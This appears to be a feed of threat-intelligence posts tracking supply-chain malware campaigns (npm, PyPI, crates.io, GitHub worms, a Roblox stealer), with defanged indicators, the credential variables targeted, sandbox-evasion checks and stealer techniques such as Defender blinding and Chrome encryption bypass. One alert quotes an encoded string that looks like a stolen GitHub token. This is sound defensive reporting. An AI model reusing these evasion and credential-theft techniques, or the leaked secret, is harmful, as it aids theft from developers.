A few npm packages seem to be loaders: they npm install socket io as a RAT, fetch a second stage (0001.dat) from the same C2, and run it. The C2 is associated with FAMOUS CHOLLIMA, the DPRK crew behind Contagious Interview. Expecting more. Packages below.

NPM Malware > - Obfuscated postinstall hook (.prepare.cjs) uses char-code arrays to hide sensitive variable names - Credential harvesting targeting AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, NPM_TOKEN - Exfiltration endpoint at open[.larksuite[.com (Feishu bot webhook) acts as C2 - Explicit sandbox evasion logic checking for SANDYCLAW, OPENCLAW, PERMISO, CHAINRADAR env https[://www[.npmjs[.com/package/ash-claw/v/1.7.13 https[://sandyclaw[.permiso[.io/shared/5PVyO_QI-Y0ENhwni99JtULn_f8oVSMpqWXiYktq5E4 @TekDefense 😂

Github ransomware? Lapsus$ https[://www[.ransomware[.live/id/R0lUSFVCIElOVEVSTkFMQGxhcHN1cyQ=

Miasma > About to heat up? A bunch of the infected miasma repos that disappeared from github just popped back up. Last Friday about this time was the last wave. https[://github[.com/betotk72/plutonian-charon-24342 https[://github[.com/codemo0nkey/funereal-hecate-6634 https[://github[.com/Ethan-iopasd/erebean-phlegethon-42318 https[://github[.com/samuelrizerio/sepulchral-thanatos-4253 https[://github[.com/victorighalo/stygian-phlegethon-18968 https[://github[.com/dmastag/infernal-acheron-28466 More

NPM Malware > DPRK Campaign > Steals yo wife, Steal yo kids (Secrets & SSH Persistence). Infected Repos: https[://www[.npmjs[.com/package/parket-slot https[://www[.npmjs[.com/package/websocket-slot These are a dependency of: https[://www[.npmjs[.com/package/ts-ecro https[://www[.npmjs[.com/package/ts-esys Squatting legit repo: github[.com/MikeMcl/big.js C2: https://[datasecure-service[.vercel[.app This is a continuation of a campaign seen since April: panther.com/blog/tracking-an… Thanks @500mk500 for context

We have detected that the popular package `onering` on crates.io has been compromised with an information stealer that runs on build, which sends a git diff to a Sentry endpoint without authorization: github.com/cenotelie/onering… This is quite novel.

It's finally happening. We can put this whole install script NPM worm madness behind us... github.blog/changelog/2026-0…

Interesting PoC

// CI/CD sandbox detection (prefix-based, catches all SandyClaw/OpenClaw/Permiso variants) 🤷‍♂️ sandyclaw.permiso.io/shared/… (Malicious) https[://www[.npmjs[.com/package/visa-response/v/1.4.4-beta?activeTab=code

🚨 Breaking: Miasma Malware Goes Open Source (Hades / Shai-Hulud Variants) TeamPCP's decision to open-source Shai-Hulud has spawned even more copycats, giving threat actors more tools to spread supply chain malware online. Thanks to @KirkDerpca for bringing this to our attention!

🚨 Mini Shai-Hulud, Miasma, and Hades worms are now targeting Bioinformatics & AI devs! hiding JS stealers inside native Python extensions & .pth files, and even use prompt injection to blind AI security scanners. socket.dev/blog/mini-shai-hu…

#threatreport #HighCompleteness AI-Powered Cheats & Stolen Secrets: Teardown of the Yuta/Solara Roblox Stealer | 04-06-2026 Source: derp.ca/research/yuta-solara… Key details below ↓ 💀Threats: Glove_stealer, Uac_bypass_technique, Dead_drop_technique, Silent_loader, Dll_injection_technique, Chromekatz_tool, 🎯Victims: Roblox users, Game cheat users, Software developers, Cryptocurrency users 🏭Industry: Entertainment 📚TTPs: ⚔️Tactics: 4 🛠️Technics: 10 🧨IOCs: - Hash: 2 - Url: 3 - Path: 2 - File: 26 💽Software: Roblox, Windows Defender, DeepSeek, Google Chrome, PyInstaller, Discord, Pastebin, Telegram, Chrome, Authy, ... 📲Wallets: metamask, exodus_wallet 🔢Algorithms: sha256, aes-cbc, aes-gcm, base64, zip, xor, aes 🔠Functions: _is_sandbox, Set-MpPreference, DPAPI 🗂️Win API: AmsiOpenSession, CoSetProxyBlanket, SeDebugPrivilege, NtCreateThreadEx, SetWindowsHookExW 📜Programming Languages: python, powershell 💻Platforms: intel #threatreport: The Yuta/Solara campaign targets the Roblox platform with sophisticated evasion techniques and a multi-stage execution model. It begins with a seemingly legitimate .NET WPF application, which acts as an executor for Roblox cheats. This application is designed to deceive users while a secondary payload, created with PyInstaller, is executed silently in the background. This payload is a sophisticated implementation of the Glove Stealer malware family that employs various techniques to bypass security measures and exfiltrate sensitive user data. The malware features a complex orchestration process that includes establishing command-and-control (C2) communication through Discord, utilizing specific configuration points for payload delivery and data exfiltration. It is particularly adept at ensuring persistence on compromised systems, implementing a six-layer persistence strategy that includes scheduled tasks, registry modifications, and WMI event subscriptions, ensuring its survival across reboots. To maintain operational stealth, the malware uses several techniques to blind Windows Defender, including prefixing commands to add exclusion paths and executing administrative invocations to trigger silent UAC prompts. This allows it to run undetected while executing a series of tasks to collect sensitive information. One notable method involves bypassing Chrome's App-Bound Encryption (ABE), using a five-tier approach inspired by previous malware versions and public research, facilitating access to decrypted user data such as cookies and tokens. Data exfiltration is carried out in memory without writing to disk, utilizing in-memory ZIP file creation. This avoids triggering common detection methods associated with file writes. The malware also implements a Discord bot for remote command execution, allowing threat actors to manage the infection and data theft actively. The campaign demonstrates advanced capabilities in memory manipulation, defense evasion, and data collection, specifically targeting high-value credentials and secrets related to gaming and development work. It is an illustration of the evolving tactics used by threat actors in the landscape of online gaming platforms, reflecting a shift towards more sophisticated and targeted cybercriminal approaches.

This is the new varient. ``` GitHub search monitor: new result Watch: DontRevokeOrItGoesBoom commit search Query: DontRevokeOrItGoesBoom Search URL: github.com/search?q=DontRevo… New results in this alert: 1 - felixEvora/erebean-hecate-42983@685a8f80c870 DontRevokeOrItGoesBoom:Z2l0aHViX3BhdF8xMUFwZW9wNkRvWDJDNjJYUUZlRGt3X2FVcGhrSDZrN2RpRUZwaXJRK2NIYkRRTlpxMUsyYkxvMnROQUZHWmNtQnoxNDFyVzl6ajRkVmVIRzVoeUwvSmQxeWdBQUE 2026-06-08T04:04:34.000 02:00 github.com/felixEvora/erebea… ```

Shai-Hulud: Miasma Todays PyPi attack is a devolved version of the DurableTask/Frogger varients. Missing from PyPI tree: Azure providers, GCP providers, password manager collection, RubyGems compromise, fine-grained GitHub PAT handling, GitHub Action release compromise, broad npm OIDC workflow compromise, PR/build-file/Dockerfile persistence, SSH known-host propagation, and sandbox/StepSecurity/Docker/sudo bypass logic. Also has a C2 > https[://git-tanstack[.com:443/router

I know its Saturday, we dont take breaks :P @inf0stache @MalwareUtkonos @AhmadNassri @geynis48380 @JFrogSecurity

NPM Malware > Seen this pattern before. "Security Research" ng-search-api/v/99.9.1 motiondnb/v/99.9.1 iug24bqzzobt38fce7rxt4g8izoqmed22[.oastify.com g1i0b9xx6mira6mal5yv02n6pxvouck09[.oastify.com Sandbox: sandyclaw.permiso.io/shared/… sandyclaw.permiso.io/shared/…